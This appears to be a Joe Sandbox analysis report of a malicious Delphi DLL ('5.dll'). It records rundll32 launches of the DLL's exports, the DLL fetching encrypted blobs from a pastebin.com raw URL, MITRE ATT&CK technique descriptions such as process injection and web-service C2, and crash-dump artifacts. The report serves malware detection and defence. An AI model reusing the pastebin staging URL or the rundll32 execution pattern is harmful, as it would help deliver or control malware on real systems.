2024-10-03 01:35:08 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 29 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9319f4b3a42c6-EWR
2024-10-03 01:35:08 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49764	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:09 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:09 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:09 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 30 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931a3cecac47a-EWR
2024-10-03 01:35:09 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	6
Start time:	21:31:01
Start date:	02/10/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\5.dll"
Imagebase:	0xcf0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:31:01
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:31:01
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5.dll",#1
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:31:01
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,TMethodImplementationIntercept
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:31:01
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\5.dll",#1
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:31:05
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,__dbk_fcall_wrapper
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:31:08
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5.dll,azo06olt3gs7uifwf18b8
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	21:32:06
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\5.dll",TMethodImplementationIntercept
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:32:06
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\5.dll",__dbk_fcall_wrapper
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:32:06
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\5.dll",azo06olt3gs7uifwf18b8
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	21:32:06
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\5.dll",dbkFCallWrapperAddr
Imagebase:	0x940000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	21:33:20
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7432 -s 704
Imagebase:	0x70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	21:33:48
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7972 -s 712
Imagebase:	0x70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	21:33:49
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 696
Imagebase:	0x70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	21:33:59
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 696
Imagebase:	0x70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c11fc434b2ae51c730bfcbd95eaf71498a857ba_7522e4b5_0fb7ab75-edfc-41bf-a9b9-14de17a46d00\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c11fc434b2ae51c730bfcbd95eaf71498a857ba_7522e4b5_42576753-4178-4839-8eac-13ee23643e2c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f48ee1d79ba125ec73679e59d0b16d42546ec4d_7522e4b5_256b9362-2db3-403a-a4b5-8296c3b6906c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f48ee1d79ba125ec73679e59d0b16d42546ec4d_7522e4b5_8974e0c5-0254-4f14-aaad-496eda389701\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D36.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E6F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E8F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8904.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A9B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D0D.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF422.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5AA.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF637.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6E1.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF934.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF954.tmp.xml

C:\Users\user\Desktop\rundll32.txt

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
5.dll